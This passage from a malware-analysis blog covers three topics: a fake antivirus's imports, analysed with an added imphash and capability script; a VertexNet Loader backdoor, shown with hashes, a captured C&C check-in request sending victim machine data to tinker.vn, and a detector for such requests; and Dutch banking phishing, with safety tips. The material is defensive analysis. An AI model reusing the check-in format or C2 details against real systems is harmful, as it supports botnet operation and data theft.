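Added example, not code from the post. IMPORTS transcribes the printed import
list; MSVC6_CRT and CAPABILITY_RULES are this example's heuristics.
"""
import hashlib

IMPORTS = [
    ("KERNEL32.dll", [
        "Sleep", "CloseHandle", "GetProcAddress", "GetModuleHandleA",
        "InterlockedExchange", "SetEvent", "CreateFileA", "VirtualAllocEx",
        "LCMapStringA", "GetStringTypeW", "GetStringTypeA", "MultiByteToWideChar",
        "RaiseException", "LoadLibraryA", "GetOEMCP", "GetStartupInfoA",
        "GetCommandLineA", "GetVersion", "ExitProcess", "HeapFree",
        "TerminateProcess", "GetCurrentProcess", "UnhandledExceptionFilter",
        "GetModuleFileNameA", "FreeEnvironmentStringsA", "FreeEnvironmentStringsW",
        "WideCharToMultiByte", "GetEnvironmentStrings", "GetEnvironmentStringsW",
        "SetHandleCount", "GetStdHandle", "GetFileType", "HeapDestroy",
        "HeapCreate", "VirtualFree", "RtlUnwind", "WriteFile", "HeapAlloc",
        "VirtualAlloc", "HeapReAlloc", "GetCPInfo", "GetACP", "LCMapStringW",
    ]),
    ("USER32.dll", ["LoadBitmapA", "ShowWindow", "LoadImageA", "LoadIconA"]),
    ("WINMM.dll", ["mixerGetControlDetailsA"]),
]

# Imports the statically linked MSVC 6 C runtime pulls in on its own (startup,
# heap, locale, exit). Filtering them out leaves what the author's code calls.
MSVC6_CRT = {
    "GetStringTypeA", "GetStringTypeW", "LCMapStringA", "LCMapStringW",
    "MultiByteToWideChar", "WideCharToMultiByte", "GetCPInfo", "GetACP", "GetOEMCP",
    "HeapAlloc", "HeapFree", "HeapReAlloc", "HeapCreate", "HeapDestroy",
    "VirtualAlloc", "VirtualFree", "GetStartupInfoA", "GetCommandLineA",
    "GetVersion", "ExitProcess", "TerminateProcess", "GetCurrentProcess",
    "UnhandledExceptionFilter", "GetModuleFileNameA", "GetModuleHandleA",
    "FreeEnvironmentStringsA", "FreeEnvironmentStringsW", "GetEnvironmentStrings",
    "GetEnvironmentStringsW", "SetHandleCount", "GetStdHandle", "GetFileType",
    "RtlUnwind", "WriteFile", "RaiseException",
}

CAPABILITY_RULES = [
    ("resolves APIs at runtime (LoadLibraryA + GetProcAddress): the static import "
     "table understates what it does", {"LoadLibraryA", "GetProcAddress"}),
    ("allocates memory in another process (VirtualAllocEx): injection/unpacking", {"VirtualAllocEx"}),
    ("opens or creates files (CreateFileA)", {"CreateFileA"}),
    ("signals an event (SetEvent): thread/process hand-off", {"SetEvent"}),
    ("loads bitmaps/icons (USER32): draws its own fake-AV interface", {"LoadBitmapA", "LoadIconA"}),
]


def imphash(imports) -> str:
    """pefile-style import hash over (dll, [function, ...]) pairs in import order."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        stem, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            lib = stem
        parts.extend(f"{lib}.{func.lower()}" for func in funcs)
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def non_crt_imports(imports) -> dict[str, list[str]]:
    """Drop the CRT boilerplate; what remains is the author's own API surface."""
    return {dll: [f for f in funcs if f not in MSVC6_CRT] for dll, funcs in imports}


def capabilities(imports) -> list[str]:
    names = {f for _, funcs in imports for f in funcs}
    return [label for label, needed in CAPABILITY_RULES if needed <= names]


if __name__ == "__main__":
    print("imphash:", imphash(IMPORTS))
    for dll, funcs in non_crt_imports(IMPORTS).items():
        print(dll, funcs)
    for cap in capabilities(IMPORTS):
        print("-", cap)
```

Once the CRT noise is gone, KERNEL32 shrinks to eight calls, and the pairing of <code>LoadLibraryA</code>/<code>GetProcAddress</code> with <code>VirtualAllocEx</code> tells you the interesting code is resolved and unpacked at runtime, so the static import list is a starting point for dynamic analysis rather than a description of the fake AV's behaviour.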
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>Live Security Platinum screenshots</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Warning popups</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eEq5vCPqGUA/UABsxO6asQI/AAAAAAAAAjs/cxA6sksANK8/s1600/13-07-2012+14-40-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-eEq5vCPqGUA/UABsxO6asQI/AAAAAAAAAjs/cxA6sksANK8/s1600/13-07-2012+14-40-55.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Live Security Platinum GUI:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-O4tjTgmgEnk/UABtmyCwWEI/AAAAAAAAAj0/pR3FJhGqD8Y/s1600/13-07-2012+14-43-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-O4tjTgmgEnk/UABtmyCwWEI/AAAAAAAAAj0/pR3FJhGqD8Y/s400/13-07-2012+14-43-07.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-b-jjCjidGis/UABt4Wo6veI/AAAAAAAAAj8/I4OpchLpzsc/s1600/13-07-2012+2-59-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-b-jjCjidGis/UABt4Wo6veI/AAAAAAAAAj8/I4OpchLpzsc/s400/13-07-2012+2-59-22.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/--gYankwygIE/UABt_1_5W4I/AAAAAAAAAkE/QnB5oKiP558/s1600/13-07-2012+14-57-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/--gYankwygIE/UABt_1_5W4I/AAAAAAAAAkE/QnB5oKiP558/s400/13-07-2012+14-57-30.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Qm4pqvTAHpc/UABuE293GTI/AAAAAAAAAkM/0h4QprHwAqU/s1600/13-07-2012+14-58-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-Qm4pqvTAHpc/UABuE293GTI/AAAAAAAAAkM/0h4QprHwAqU/s400/13-07-2012+14-58-54.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-yMXcrwU-BQE/UABuJweJQNI/AAAAAAAAAkU/rQnkBeX_434/s1600/13-07-2012+15-00-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-yMXcrwU-BQE/UABuJweJQNI/AAAAAAAAAkU/rQnkBeX_434/s400/13-07-2012+15-00-00.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: large;"><b>Live Security Platinum monetization</b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-9x6WNMJRDfo/UABvcCkOmiI/AAAAAAAAAkk/qE3oBigle1Y/s1600/13-07-2012+3-00-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="http://4.bp.blogspot.com/-9x6WNMJRDfo/UABvcCkOmiI/AAAAAAAAAkk/qE3oBigle1Y/s400/13-07-2012+3-00-55.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-large;"><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Live Security Platinum registration</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5uXBfq2Ja6g/UABuWRU0wMI/AAAAAAAAAkc/HZytqnszptc/s1600/13-07-2012+3-35-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://3.bp.blogspot.com/-5uXBfq2Ja6g/UABuWRU0wMI/AAAAAAAAAkc/HZytqnszptc/s400/13-07-2012+3-35-58.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">** Information obtained through the automated malware-analysis process of the </span><b style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">CrimewareAttack Service</b><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;"> (by </span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;"><b>Malware<span style="color: blue;">Intelligence</span></b></span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">).</span>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 15px; text-align: -webkit-auto;"><br /></span></div>
<div class="separator" style="clear: both; text-align: -webkit-auto;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px;">Alex</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<br />

Generic trojan-type backdoor via the popular crimeware "Loader" (2012-07-06)<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-TlkJlcFOPj0/T_ZsHj6hBfI/AAAAAAAAAiM/Ur_4yn3AwzM/s1600/bot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-TlkJlcFOPj0/T_ZsHj6hBfI/AAAAAAAAAiM/Ur_4yn3AwzM/s1600/bot.png" /></a></div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">This is the icon used for this malware.</span></span><br />
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Technical information & PE file attribute</b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">MD5 : aab21e11953aee66ff16772576ceaec0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">SHA1: 576910d3ae484144db32dd835594c605dac90a9d</span><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']</span></i><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This malware was created and is spread through crimeware "</span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">VertexNet Loader</b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">".</span><br />
<b style="background-color: white; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><br />
<b style="background-color: white; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">PE information & sections:</span></b><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"> 57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)</span></i><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>12.0% (.EXE) Win32 Executable Generic (6514/8/2)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>10.3% (.EXE) Win64 Executable Generic (5563/38/1)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>3.7% (.EXE) Generic Win/DOS Executable (2002/3)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Mutex: VN_MUTEX16</span><br />
<a href="http://2.bp.blogspot.com/-gZXOMUZw9YA/T_Zs0Kt-wRI/AAAAAAAAAiU/w44cJ_5T_Xw/s1600/05-07-2012+0-21-27.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="78" src="http://2.bp.blogspot.com/-gZXOMUZw9YA/T_Zs0Kt-wRI/AAAAAAAAAiU/w44cJ_5T_Xw/s400/05-07-2012+0-21-27.png" width="400" /></a><i><span style="font-family: Arial, Helvetica, sans-serif;">Optional Header: 0x400000</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Address Of Entry Point: <span class="Apple-tab-span" style="white-space: pre;"> </span>0xaf4a</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Compile Time: 2011-06-20 11:05:05</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Number of RVA and Sizes: 16</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Number of Sections: 5</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></i><br />
<b style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">API Functions:</span></b><br />
<br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>InternetReadFile</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>CreateProcess</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>WinExec</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>ShellExecute</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>URLDownloadToFileA</span></i><br />
<br />
<span style="background-color: white; color: orange; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.virustotal.com/file/bf679313741fe95cee973d63929c263b02c7ddf1786f0495d9c45fb03d5acac4/analysis/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;" target="_blank">VT information</a></span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> about detection rate </span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="color: red;">35</span>/42 </b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>VN_MUTEX16</b> </span><span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">is the string set as the default "mutex" by the internal constructor of VertexNet Loader:</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-UvtRFYoAx-c/T_ZtVwqEyzI/AAAAAAAAAic/ZLYOrbJG_UY/s1600/04-07-2012+23-55-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="http://2.bp.blogspot.com/-UvtRFYoAx-c/T_ZtVwqEyzI/AAAAAAAAAic/ZLYOrbJG_UY/s400/04-07-2012+23-55-58.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; text-align: justify;">This information corresponds to the default settings when creating the bot through the internal constructor:</span><br />
<div class="MsoNoSpacing">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DYGlc6c4dgk/T_ZtoZ4cU5I/AAAAAAAAAik/BwJPRfwqnvI/s1600/updt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="367" src="http://4.bp.blogspot.com/-DYGlc6c4dgk/T_ZtoZ4cU5I/AAAAAAAAAik/BwJPRfwqnvI/s400/updt.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Information reported in the C&C statistics panel about the infected machine:</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-zIlPLWkrE4g/T_ZtvEToyRI/AAAAAAAAAis/j2VVYCNz9a8/s1600/04-07-2012+23-47-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-zIlPLWkrE4g/T_ZtvEToyRI/AAAAAAAAAis/j2VVYCNz9a8/s400/04-07-2012+23-47-19.png" width="400" /></a></div>
<div class="MsoNoSpacing">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">This information is inserted into the crimeware's database</span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> (MySQL by default). </span><span lang="EN-US" style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This C&C communication can be seen in a traffic capture:</span></div>
<div class="MsoNoSpacing">
<span lang="EN-US">
</span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br /></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">GET /x1/adduser.php?<b>uid=</b>{52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}</span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">&<b>lan=</b>XXX.XXX.XXX.XXX&<b>cmpname=</b>XXXXXXXXXX-59903E%20[Administrator]&<b>country=</b> &<b>idle=</b>0&<b>ver=</b>v1.2 HTTP/1.1</span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">User-Agent: V32</span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">Host: tinker.vn</span></span></i></div>
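<div style="text-align: justify;">
The check-in above is easy to spot once its shape is known: a GET to adduser.php carrying the uid, lan, cmpname, country, idle and ver parameters, with the fixed User-Agent "V32". The following Python is an added example (not code from the original post or from VertexNet) that flags such requests in an HTTP request log; the log line format and the log lines themselves are constructed, while the host, the /x1/ panel path, the parameter names and the uid layout are taken from the capture above.</div>

```python
"""Flag VertexNet Loader bot check-ins in HTTP request logs.

Added example, not code from the original post. It matches the check-in
captured in the post: a GET to .../adduser.php carrying the uid, lan,
cmpname, country, idle and ver parameters, with User-Agent "V32". The log
lines in SAMPLE_LOG are constructed; the host tinker.vn, the /x1/ panel
path, the parameter names and the uid layout come from the capture.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The six query parameters the adduser.php check-in carries in the capture.
VERTEXNET_PARAMS = frozenset({"uid", "lan", "cmpname", "country", "idle", "ver"})
VERTEXNET_USER_AGENT = "V32"
# uid is "{GUID--<decimal>}"; the x's also accept the redacted GUID shown in the post.
UID_RE = re.compile(
    r"^\{[0-9a-fx]{8}-[0-9a-fx]{4}-[0-9a-fx]{4}-[0-9a-fx]{4}-[0-9a-fx]{12}--\d+\}$",
    re.IGNORECASE,
)

# Constructed proxy-log lines: "<client_ip> <method> <url> <user_agent>".
SAMPLE_LOG = """\
10.0.0.5 GET http://tinker.vn/x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}&lan=10.0.0.5&cmpname=HOST-59903E%20[Administrator]&country=&idle=0&ver=v1.2 V32
10.0.0.7 GET http://www.example.com/index.php?page=1 Mozilla/5.0
10.0.0.9 GET http://example.org/x1/adduser.php?uid=abc&foo=1 Mozilla/5.0
10.0.0.11 GET http://example.net/panel/adduser.php?uid={11111111-2222-3333-4444-555555555555--42}&lan=10.0.0.11&cmpname=WS01%20[user]&country=&idle=3&ver=v1.2 V32
"""


def parse_log_line(line):
    """Split one constructed log line into its four fields, or return None."""
    parts = line.strip().split(" ", 3)
    if len(parts) != 4:
        return None
    client, method, url, user_agent = parts
    return {"client": client, "method": method, "url": url, "user_agent": user_agent}


def classify_request(entry):
    """Describe a VertexNet check-in, or return None for a request that is not one."""
    url = urlsplit(entry["url"])
    if entry["method"] != "GET" or not url.path.endswith("/adduser.php"):
        return None
    query = parse_qs(url.query, keep_blank_values=True)  # country= is sent empty
    if not VERTEXNET_PARAMS <= set(query):  # all six parameters must be present
        return None
    uid = query["uid"][0]
    if not UID_RE.match(uid):
        return None
    return {
        "client": entry["client"],
        "c2_host": url.hostname,
        "panel_path": url.path.rsplit("/", 1)[0] + "/",  # /x1/ in the post
        "bot_uid": uid,
        "machine": query["cmpname"][0],  # parse_qs has already decoded %20
        "bot_version": query["ver"][0],
        # The fixed User-Agent is a second, independent indicator.
        "user_agent_match": entry["user_agent"] == VERTEXNET_USER_AGENT,
    }


def find_checkins(log_text):
    """Return one record per VertexNet check-in found in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        hit = classify_request(entry)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in find_checkins(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['c2_host']}{hit['panel_path']} "
              f"uid={hit['bot_uid']} machine={hit['machine']!r} ver={hit['bot_version']}")
```

The third sample line hits adduser.php but lacks the full parameter set, so it is left alone; the fourth shows that the same bot family is recognised on a different host and panel path.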
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; text-align: center;">
<i><span lang="EN-US">You can read more about this crimeware's functions, its commands and the data it extracts from infected machines in the <b>Malware<span style="color: blue;">Intelligence</span></b> post: <a href="http://malwareint.blogspot.com/2012/07/vertexnet-loader-crimeware-timeline.html" target="_blank">VertexNetLoader crimeware timeline, popular functions and marketing scheme</a></span></i></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br />
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<b><span lang="EN-US" style="font-size: 14pt;">VertexNet Loader crimeware C&C</span></b></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US">In this case, the malware's control panel is hosted at hxxp://tinker.vn/x1/</span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-O-B8WW6UpZM/T_ZuZpXm5uI/AAAAAAAAAi0/zAoGycoRa4A/s1600/05-07-2012+0-19-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="http://4.bp.blogspot.com/-O-B8WW6UpZM/T_ZuZpXm5uI/AAAAAAAAAi0/zAoGycoRa4A/s400/05-07-2012+0-19-09.png" width="400" /></a></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
** Information obtained through the automated malware analysis process of the <b>CrimewareAttack Service</b> (by <span style="background-color: white;"> <b>Malware<span style="color: blue;">Intelligence</span></b></span><span style="background-color: white;">).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.twitter.com/MalwareInt" target="_blank"><img border="0" height="135" src="http://3.bp.blogspot.com/-f1ynt36hKps/T_Z4vA5lJnI/AAAAAAAAAjA/GszFQ_A_YG0/s200/MalwareInt-Twitter.png" width="200" /></a></div>
<span style="background-color: white;"><br /></span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US"></span></div>
<div class="MsoNoSpacing">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Alex</span></div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-56749013041216653042011-04-12T02:44:00.000+01:002015-09-02T00:59:07.723+01:00Increase in Dutch banking phishing<div style="text-align: justify;">
Over the last few months there has been an increase in phishing campaigns targeting customers of Rabobank and ING, two major banks in the Netherlands and Belgium. Some examples of the phishing mails:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-i-DM77ulMIw/TaOsYMNJvZI/AAAAAAAAAcQ/FThX3p6hn3I/s1600/p1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-i-DM77ulMIw/TaOsYMNJvZI/AAAAAAAAAcQ/FThX3p6hn3I/s400/p1.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing email for ING with the subject “Account Verificatie” (or in English: “Account Verification”) </i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-doKHmpomUpk/TaOsiVkm37I/AAAAAAAAAcU/4eBNn8hOk54/s1600/p2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-doKHmpomUpk/TaOsiVkm37I/AAAAAAAAAcU/4eBNn8hOk54/s400/p2.jpg" width="372" /></a></div>
<div style="text-align: center;">
<i>Phishing email for Rabobank with the subject “Customer Services Update”.</i></div>
<br />
<div style="text-align: justify;">
If you speak Dutch, you will notice that the content of these emails is actually quite different from most phishing mails. There is a greater variety, and the first version contains almost no grammatical or spelling errors. The second email, for Rabobank, is however clearly a Google Translate copy/paste job.</div>
<br />
<div style="text-align: justify;">
All emails seem to originate from valid email addresses: the sender domains are @rabobank.nl and @ing.nl, which are in fact the legitimate domains of the two banks.<br />
However, if we check the message headers we can see IPs originating from Nigeria:</div>
<br />
<a href="http://whois.domaintools.com/41.155.32.70" style="color: orange;">41.155.32.70</a> – <a href="http://ipvoid.com/scan/41.155.32.70" style="color: orange;">IPVoid results</a><br />
<a href="http://whois.domaintools.com/82.128.38.67" style="color: orange;">82.128.38.67</a> – <a href="http://ipvoid.com/scan/82.128.38.67" style="color: orange;">IPVoid results</a><br />
<br />
<div style="text-align: justify;">
Another IP address originates from New Zealand and is listed on several blacklists, as a check with IPVoid confirms:</div>
<br />
<a href="http://whois.domaintools.com/203.97.33.68" style="color: orange;">203.97.33.68</a> – <a href="http://ipvoid.com/scan/203.97.33.68" style="color: orange;">IPVoid results</a><br />
<br />
<div style="text-align: justify;">
This means the sender addresses are spoofed to trick users into believing the email is genuine.<br />
Now, what happens if you click on the link included in the message? You will be redirected to one of these pages: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-qpDcW43u_hg/TaOstD0-c8I/AAAAAAAAAcY/HiyDUKBT_TY/s1600/p3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://3.bp.blogspot.com/-qpDcW43u_hg/TaOstD0-c8I/AAAAAAAAAcY/HiyDUKBT_TY/s400/p3.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing website for ING. The user has to log in with his/her username and password. You can also opt to log in with the ‘calculator’, which is in fact a card reader that can be used to log in.</i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-M2ajwiuHOVo/TaOs3ATjGYI/AAAAAAAAAcc/ydE9F89XE58/s1600/p4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://3.bp.blogspot.com/-M2ajwiuHOVo/TaOs3ATjGYI/AAAAAAAAAcc/ydE9F89XE58/s400/p4.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing website for Rabobank. You can log in using your account number, access code and PIN code. You can also use your card reader.</i></div>
<br />
<div style="text-align: justify;">
The intention of these emails is of course to steal user credentials and empty the account of the duped user. These attacks are pretty well orchestrated. If you click on any of the links on the phishing page, it will redirect you to the real ING website which provides extra information on the topic you clicked on.</div>
<br />
The following tips do not only apply to the above story, but apply to any other (suspicious) email you receive:<br />
<ul>
<li>Do not click on any of the links (or anything for that matter) in the email you have received.</li>
<li>Do not reply to the email.</li>
<li>Delete the email immediately, especially if you are not a customer of the bank in question or did not order anything, change your password, and so on.</li>
<li>If you really need to access or check your bank account, visit the website directly by typing the address in your browser’s address bar. Also verify the URL starts with https instead of http.</li>
<li>Another useful trick is to hover over the link in the email. In the bottom left corner of your mail client or browser you should see the real address behind the displayed link text.</li>
<li>When in doubt, you can double-check using URL scanning services such as <a href="http://www.virustotal.com/" style="color: orange;">VirusTotal</a> or <a href="http://www.urlvoid.com/" style="color: orange;">URLVoid</a> by <a href="http://www.malwareint.com/part.html" style="color: orange;">our partner</a> <a href="http://www.novirusthanks.org/" style="color: orange;">NoVirusThanks</a>.</li>
</ul>
<br />
